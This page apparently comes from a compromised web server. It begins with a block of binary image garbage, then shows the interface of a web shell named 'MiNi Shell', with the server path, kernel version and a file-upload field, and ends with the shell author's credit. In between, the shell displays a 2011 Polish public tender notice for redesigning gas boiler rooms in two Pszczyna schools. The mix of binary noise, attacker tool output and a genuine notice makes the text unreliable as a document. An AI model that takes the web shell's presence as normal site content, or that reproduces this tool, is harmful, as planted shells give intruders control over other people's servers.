JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110228/67259-N-2011.html

<p class="kh_header"><b>Pszczyna: Zadanie 1.
Projekt kompleksowej modernizacji kotłowni gazowej  w Zespole Szkół nr 2
w Pszczynie przy ul. Staromiejskiej 41

Zadanie 2.
Projekt kompleksowej modernizacji kotłowni gazowej w Szkole Podstawowej nr 4
w Pszczynie przy ul. Konopnickiej 39</b><br>
<b>Numer ogłoszenia: 67259 - 2011; data zamieszczenia: 28.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1.
Projekt kompleksowej modernizacji kotłowni gazowej  w Zespole Szkół nr 2
w Pszczynie przy ul. Staromiejskiej 41

Zadanie 2.
Projekt kompleksowej modernizacji kotłowni gazowej w Szkole Podstawowej nr 4
w Pszczynie przy ul. Konopnickiej 39.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1.
1.	Inwentaryzacja budowlana i instalacyjna istniejącej  kotłowni  
   / jedynie w zakresie niezbędnym do projektowania ,  obecnie zabudowane są  3 kotły gazowe Jubam  Gaz  
   o mocy 230 kW  każdy/
2.	Projekt budowlany modernizacji kotłowni z wyliczeniem zapotrzebowania ciepła.
3.Wykonawcze projekty branżowe:
    - budowlany  w zakresie przystosowania  pomieszczeń dla potrzeb kotłowni w zakresie:   dostawy i wymiany okien 
    i drzwi , zamurowania otworów , licowania ścian płytkami , wykonania posadzki  z płytek, remontu istniejących 
    przewodów wentylacyjnych , wykonania kanału  wentylacyjnego , malowanie ścian i sufitów  , zabudowy wkładu 
    kominowego itp.
    instalacji centralnego ogrzewania w pomieszczeniu kotłowniz uwzględnieniem demontażu kotłów ,  orurowania  , 
    wyposażenia kotłowni  i zabezpieczeń antykorozyjnych i p.poż./
    - instalacji wodno - kanalizacyjnej 
    / uwzględnieniem demontażu  pojemnościowego podgrzewacza wody , orurowania  i wyposażenia kotłowni /
    -  instalacji ciepłej wody użytkowej z zabudowaniem pojemnościowego podgrzewacza cwu
              - instalacji gazowej - w zakresie przebudowa wewnętrznej instalacji gazowej z rur stalowych bez szwu.
    - technologii kotłowni 
             - elektrycznej  - w zakresie wymiany wewnętrznych linii zasilających , tablicy rozdzielczej, instalacji   oświetlenia , 
             instalacji gniazd wtykowych , instalacji przeciwporażeniowej  , zasilania pomp i AKPiA	
             - instalacji systemu sterowania z aparaturą kontrolno- pomiarową 
             / projekt powinien zwierać instrukcje systemu sterowania/
         4. Niezbędne uzgodnienia w szczególności  z : Zakładem Gazowniczym w Zabrzu,   Sanepidem  w Tychach,   
             Państwową   Inspekcją Pracy ,  Państwową Strażą Pożarną , Urzędem Dozoru Technicznego  i  dyrekcją szkoły.
         5. Informację BIOZ
         6. Przedmiary i kosztorysy inwestorskie dla każdego z projektów
         7. Zbiorcze zestawienie kosztów
8. Specyfikacje techniczne wykonania i odbioru robót dla każdego z projektów
         9. Wersja elektroniczna w.w opracowań- pliki w formacie PDF lub JPG dla każdego z projektów, przedmiarów , 
             kosztorysów i specyfikacji technicznych wykonania i odbioru robót budowlanych
         10.  Nadzór autorski
Zadanie 2.
1.Inwentaryzacja budowlana i instalacyjna istniejącej  kotłowni  
            / jedynie w zakresie niezbędnym do projektowania, obecnie zabudowane są 2 kotły gazowe Kuba-Gaz o powierzchni
            grzewczej 6 m każdy/
2.Projekt budowlany modernizacji kotłowni z wyliczeniem zapotrzebowania ciepła
3.Wykonawcze projekty branżowe:
            - budowlany  w zakresie przystosowania  pomieszczeń dla potrzeb kotłowni w zakresie:   dostawy i wymiany  drzwi , 
   zamurowania otworów , licowania ścian płytkami , wykonania posadzki  z płytek, remontu istniejących 
  przewodów wentylacyjnych , wykonania kanału  wentylacyjnego , malowanie ścian i sufitów , zabudowania wkładu 
  kominowego itp.,
  - instalacji centralnego ogrzewania w pomieszczeniu kotłowni  
 /z uwzględnieniem demontażu kotłów ,  orurowania  i wyposażenia kotłowni /
  - instalacji wodno - kanalizacyjnej 
  / uwzględnieniem demontażu   , orurowania  i wyposażenia kotłowni /
           - instalacji gazowej - w zakresie przebudowa wewnętrznej instalacji gazowej z rur stalowych bez szwu.
 - technologii kotłowni 
          - elektrycznej  - w zakresie wymiany wewnętrznych linii zasilających , tablicy rozdzielczej, instalacji 
           oświetlenia , instalacji gniazd wtykowych , instalacji przeciwporażeniowej  , zasilania pomp i AKPiA	
          - instalacji systemu sterowania z aparaturą kontrolno- pomiarową
          / projekt powinien zwierać instrukcje systemu sterowania/
4.Niezbędne uzgodnienia w szczególności  z : Zakładem Gazowniczym w Zabrzu,  Sanepidem  w Tychach, Państwową 
       Inspekcją Pracy ,  Państwową Strażą Pożarną , Urzędem Dozoru Technicznego  i  dyrekcją szkoły.
         5. Informację BIOZ
         6.  Przedmiary i kosztorysy inwestorskie dla każdego z projektów
         7. Zbiorcze zestawienie kosztów 
8. Specyfikacje techniczne wykonania i odbioru robót dla każdego z projektów
         9. Wersja elektroniczna w.w opracowań- pliki w formacie PDF lub JPG dla każdego z projektów, przedmiarów , 
             kosztorysów i specyfikacji technicznych wykonania i odbioru robót budowlanych
         10. Nadzór autorski.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla zadania 1   -  1 000,00 zł.
      dla zadania 2  -       500,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia -nie spełnia, 
w oparciu o przedstawione przez wykonawcę dokument</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia -nie spełnia, 
w oparciu o przedstawione przez wykonawcę dokument</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie , że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie   zdrowotne i społeczne,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
43-200 Pszczyna
ul.Zdrojowa 4 pok.115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2011 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
43-200 Pszczyna
ul.Zdrojowa 4 pok.103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.
Projekt kompleksowej modernizacji kotłowni gazowej  w Zespole Szkół nr 2
w Pszczynie przy ul. Staromiejskiej 41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1.
1.	Inwentaryzacja budowlana i instalacyjna istniejącej  kotłowni  
   / jedynie w zakresie niezbędnym do projektowania ,  obecnie zabudowane są  3 kotły gazowe Jubam  Gaz  
   o mocy 230 kW  każdy/
2.	Projekt budowlany modernizacji kotłowni z wyliczeniem zapotrzebowania ciepła.
3.Wykonawcze projekty branżowe:
    - budowlany  w zakresie przystosowania  pomieszczeń dla potrzeb kotłowni w zakresie:   dostawy i wymiany okien 
    i drzwi , zamurowania otworów , licowania ścian płytkami , wykonania posadzki  z płytek, remontu istniejących 
    przewodów wentylacyjnych , wykonania kanału  wentylacyjnego , malowanie ścian i sufitów  , zabudowy wkładu 
    kominowego itp.
    instalacji centralnego ogrzewania w pomieszczeniu kotłowniz uwzględnieniem demontażu kotłów ,  orurowania  , 
    wyposażenia kotłowni  i zabezpieczeń antykorozyjnych i p.poż./
    - instalacji wodno - kanalizacyjnej 
    / uwzględnieniem demontażu  pojemnościowego podgrzewacza wody , orurowania  i wyposażenia kotłowni /
    -  instalacji ciepłej wody użytkowej z zabudowaniem pojemnościowego podgrzewacza cwu
              - instalacji gazowej - w zakresie przebudowa wewnętrznej instalacji gazowej z rur stalowych bez szwu.
    - technologii kotłowni 
             - elektrycznej  - w zakresie wymiany wewnętrznych linii zasilających , tablicy rozdzielczej, instalacji   oświetlenia , 
             instalacji gniazd wtykowych , instalacji przeciwporażeniowej  , zasilania pomp i AKPiA	
             - instalacji systemu sterowania z aparaturą kontrolno- pomiarową 
             / projekt powinien zwierać instrukcje systemu sterowania/
         4. Niezbędne uzgodnienia w szczególności  z : Zakładem Gazowniczym w Zabrzu,   Sanepidem  w Tychach,   
             Państwową   Inspekcją Pracy ,  Państwową Strażą Pożarną , Urzędem Dozoru Technicznego  i  dyrekcją szkoły.
         5. Informację BIOZ
         6. Przedmiary i kosztorysy inwestorskie dla każdego z projektów
         7. Zbiorcze zestawienie kosztów
8. Specyfikacje techniczne wykonania i odbioru robót dla każdego z projektów
         9. Wersja elektroniczna w.w opracowań- pliki w formacie PDF lub JPG dla każdego z projektów, przedmiarów , 
             kosztorysów i specyfikacji technicznych wykonania i odbioru robót budowlanych
         10.  Nadzór autorski.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Referencje - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.
Projekt kompleksowej modernizacji kotłowni gazowej w Szkole Podstawowej nr 4
w Pszczynie przy ul. Konopnickiej 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2.
1.Inwentaryzacja budowlana i instalacyjna istniejącej  kotłowni  
            / jedynie w zakresie niezbędnym do projektowania, obecnie zabudowane są 2 kotły gazowe Kuba-Gaz o powierzchni
            grzewczej 6 m każdy/
2.Projekt budowlany modernizacji kotłowni z wyliczeniem zapotrzebowania ciepła
3.Wykonawcze projekty branżowe:
            - budowlany  w zakresie przystosowania  pomieszczeń dla potrzeb kotłowni w zakresie:   dostawy i wymiany  drzwi , 
   zamurowania otworów , licowania ścian płytkami , wykonania posadzki  z płytek, remontu istniejących 
  przewodów wentylacyjnych , wykonania kanału  wentylacyjnego , malowanie ścian i sufitów , zabudowania wkładu 
  kominowego itp.,
  - instalacji centralnego ogrzewania w pomieszczeniu kotłowni  
 /z uwzględnieniem demontażu kotłów ,  orurowania  i wyposażenia kotłowni /
  - instalacji wodno - kanalizacyjnej 
  / uwzględnieniem demontażu   , orurowania  i wyposażenia kotłowni /
           - instalacji gazowej - w zakresie przebudowa wewnętrznej instalacji gazowej z rur stalowych bez szwu.
 - technologii kotłowni 
          - elektrycznej  - w zakresie wymiany wewnętrznych linii zasilających , tablicy rozdzielczej, instalacji 
           oświetlenia , instalacji gniazd wtykowych , instalacji przeciwporażeniowej  , zasilania pomp i AKPiA	
          - instalacji systemu sterowania z aparaturą kontrolno- pomiarową
          / projekt powinien zwierać instrukcje systemu sterowania/
4.Niezbędne uzgodnienia w szczególności  z : Zakładem Gazowniczym w Zabrzu,  Sanepidem  w Tychach, Państwową 
       Inspekcją Pracy ,  Państwową Strażą Pożarną , Urzędem Dozoru Technicznego  i  dyrekcją szkoły.
         5. Informację BIOZ
         6.  Przedmiary i kosztorysy inwestorskie dla każdego z projektów
         7. Zbiorcze zestawienie kosztów 
8. Specyfikacje techniczne wykonania i odbioru robót dla każdego z projektów
         9. Wersja elektroniczna w.w opracowań- pliki w formacie PDF lub JPG dla każdego z projektów, przedmiarów , 
             kosztorysów i specyfikacji technicznych wykonania i odbioru robót budowlanych
         10. Nadzór autorski.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Referencje - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com